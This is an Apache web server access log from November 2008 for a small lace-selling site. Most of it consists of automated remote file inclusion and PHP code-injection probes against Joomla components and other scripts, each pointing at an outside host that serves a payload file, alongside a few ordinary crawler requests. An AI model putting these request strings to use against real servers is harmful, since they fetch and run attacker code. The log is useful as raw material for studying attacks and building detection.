80.72.85.178 - - [22/Nov/2008:05:05:45 -0800] "GET /logs/access.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.handmadelaces.com"
80.72.85.178 - - [22/Nov/2008:05:05:45 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.handmadelaces.com"
80.72.85.178 - - [22/Nov/2008:05:05:45 -0800] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.handmadelaces.com"
211.255.32.189 - - [22/Nov/2008:05:06:19 -0800] "GET /logs/access_081014.log/?DOCUMENT_ROOT=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:43 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:44 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:45 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:57 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:57 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:58 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:58 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:59 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:06:59 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:06:59 -0800] "GET /logs/access_081023.log//bbs//skin/zero_vote/error.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:07:00 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:07:00 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:07:17 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:07:18 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:07:18 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:07:36 -0800] "GET /logs//booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:07:36 -0800] "GET /booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:07:37 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:07:37 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
65.55.105.24 - - [22/Nov/2008:05:08:02 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
65.55.105.24 - - [22/Nov/2008:05:08:03 -0800] "GET /logs/access_081116.log HTTP/1.1" 200 1175450 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:08:06 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:08:10 -0800] "GET /logs/access_081023.log//bbs//skin/zero_vote/ask_password.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:08:11 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:08:11 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:08:12 -0800] "GET /logs//booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:08:12 -0800] "GET /booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
72.55.179.37 - - [22/Nov/2008:05:08:24 -0800] "GET /component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.handmadelaces.com"
72.55.179.37 - - [22/Nov/2008:05:08:24 -0800] "GET /logs//component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.handmadelaces.com"
72.55.179.37 - - [22/Nov/2008:05:08:24 -0800] "GET /logs/access_081023.log//component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:08:25 -0800] "GET /logs//booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:08:25 -0800] "GET /booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:08:35 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:09:20 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:09:20 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:09:20 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:09:20 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:09:20 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:05:09:20 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:09:30 -0800] "GET /logs//booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:09:30 -0800] "GET /booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
121.135.147.72 - - [22/Nov/2008:05:10:20 -0800] "GET /?prefix=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.handmadelaces.com"
121.135.147.72 - - [22/Nov/2008:05:10:22 -0800] "GET /logs//?prefix=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:10:40 -0800] "GET /logs/access_081020.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:10:43 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
219.117.252.226 - - [22/Nov/2008:05:10:44 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
212.76.68.90 - - [22/Nov/2008:05:11:00 -0800] "GET /logs/access_081014.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
212.76.68.90 - - [22/Nov/2008:05:11:01 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
212.76.68.90 - - [22/Nov/2008:05:11:02 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
212.76.68.90 - - [22/Nov/2008:05:11:06 -0800] "GET /logs/access_081021.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
211.255.32.189 - - [22/Nov/2008:05:11:35 -0800] "GET /?DOCUMENT_ROOT=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.handmadelaces.com"
72.55.179.37 - - [22/Nov/2008:05:11:45 -0800] "GET /logs/access_081018.log//component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.handmadelaces.com"
211.115.110.161 - - [22/Nov/2008:05:11:45 -0800] "GET /logs/access_081020.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
211.115.110.161 - - [22/Nov/2008:05:11:46 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
211.115.110.161 - - [22/Nov/2008:05:11:46 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
72.232.164.26 - - [22/Nov/2008:05:11:48 -0800] "GET /logs/access.log HTTP/1.0" 200 114492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:12:02 -0800] "GET /logs//booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:12:02 -0800] "GET /booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:12:12 -0800] "GET /logs//booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:05:12:12 -0800] "GET /booth.php?include_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:12:52 -0800] "GET /logs/access_081021.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:12:52 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:12:52 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:12:52 -0800] "GET /logs/access_081021.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:12:53 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:12:53 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:13:19 -0800] "GET /logs/access_081021.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:13:19 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:13:20 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
83.222.23.232 - - [22/Nov/2008:05:13:26 -0800] "GET /logs//errors.php?error=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
83.222.23.232 - - [22/Nov/2008:05:13:26 -0800] "GET /errors.php?error=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:13:31 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
213.165.84.215 - - [22/Nov/2008:05:13:32 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
213.165.84.215 - - [22/Nov/2008:05:13:34 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:13:59 -0800] "GET /logs/access_081011.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:14:15 -0800] "GET /logs/access_081011.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:14:28 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:14:40 -0800] "GET /logs/access_081011.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:14:56 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
194.177.196.2 - - [22/Nov/2008:05:15:04 -0800] "GET /logs/access_081016.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
190.56.164.90 - - [22/Nov/2008:05:16:07 -0800] "GET /logs/access_081023.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:05:16:34 -0800] "GET /logs/access_081020.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:16:41 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:16:41 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
202.125.38.99 - - [22/Nov/2008:05:16:54 -0800] "GET /logs/access.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:18:53 -0800] "GET /logs/access_081021.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:18:53 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:18:53 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:18:54 -0800] "GET /logs/access_081021.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:18:54 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:18:54 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:19:07 -0800] "GET /logs/access_081021.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:19:07 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:05:19:07 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
83.2.108.2 - - [22/Nov/2008:05:20:23 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.handmadelaces.com"
83.2.108.2 - - [22/Nov/2008:05:20:23 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.handmadelaces.com"
212.227.60.81 - - [22/Nov/2008:05:20:37 -0800] "GET /component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
212.227.60.81 - - [22/Nov/2008:05:20:37 -0800] "GET /logs//component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
212.227.60.81 - - [22/Nov/2008:05:20:49 -0800] "GET /logs/access_081023.log//component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
